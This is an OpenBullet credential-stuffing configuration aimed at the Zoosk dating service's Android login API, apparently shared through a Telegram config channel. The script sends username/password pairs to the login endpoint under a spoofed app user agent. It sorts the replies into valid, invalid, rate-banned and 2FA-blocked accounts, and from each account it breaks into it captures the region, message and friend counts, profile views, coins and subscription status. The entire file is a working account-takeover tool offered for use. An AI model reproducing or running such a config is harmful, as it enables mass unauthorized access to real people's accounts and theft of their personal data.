[SETTINGS] { "Name": "Zoosk Api", "SuggestedBots": 1, "MaxCPM": 0, "LastModified": "2020-08-10T16:54:33.2027329+04:30", "AdditionalInfo": "Proxy HQ | https://t.me/OpenBulletConfigs Join!!!", "RequiredPlugins": [], "Author": "KindKhers4lx", "Version": "1.2.2", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": false, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] #udid FUNCTION RandomString "?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n?n" -> VAR "udid" #UP FUNCTION URLEncode "" -> VAR "UP" #PS FUNCTION URLEncode "" -> VAR "PS" #Length FUNCTION Length "password=&udid=&login=" -> VAR "L1" #Login REQUEST POST "https://api-android.zoosk.com/v4.0/api.php?locale=en_US&product=4&format=json&z_device_id=159705865058&rpc=login%2Fgeneral_v43 " CONTENT "password=&udid=&login=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Content-Length: " HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "Host: api-android.zoosk.com" HEADER "Connection: Keep-Alive" HEADER "User-Agent: ZooskAndroid/577 (Linux; U; Android 5.1.1; en-US; google Pixel 2; Build/LMY47I)" KEYCHECK KEYCHAIN Failure OR KEY "We're sorry, the email and password combination you entered doesn't match" KEYCHAIN Ban OR KEY "RAY-ID" KEY "Gone" KEY "error code" KEYCHAIN Success OR KEY "success\",\"" KEYCHECK BanOnToCheck=FALSE KEYCHAIN Custom "2FACTOR" OR KEY "is_blocked\":true" #Region PARSE "" LR "locale\":\"" "\"" CreateEmpty=FALSE -> CAP "Region" #New_Message PARSE "" LR "has_new_msg\":" ",\"" CreateEmpty=FALSE -> CAP "New Message" #Friend_Req_Count PARSE "" LR "friend_request_count\":" ",\"" CreateEmpty=FALSE -> CAP "Friend Req Count" #Trusted_Friend_Count PARSE "" LR "trusted_friend_count\":" ",\"" CreateEmpty=FALSE -> CAP "Trusted Friend Count" #Profile_Views PARSE "" LR "profile_view_count\":" ",\"" CreateEmpty=FALSE -> CAP "Profile Views" #Coin(s) PARSE "" LR "coin_count\":" ",\"" CreateEmpty=FALSE -> CAP "Coin(s)" #Subscriber PARSE "" LR "is_subscriber\":" ",\"" CreateEmpty=FALSE -> CAP "Subscriber"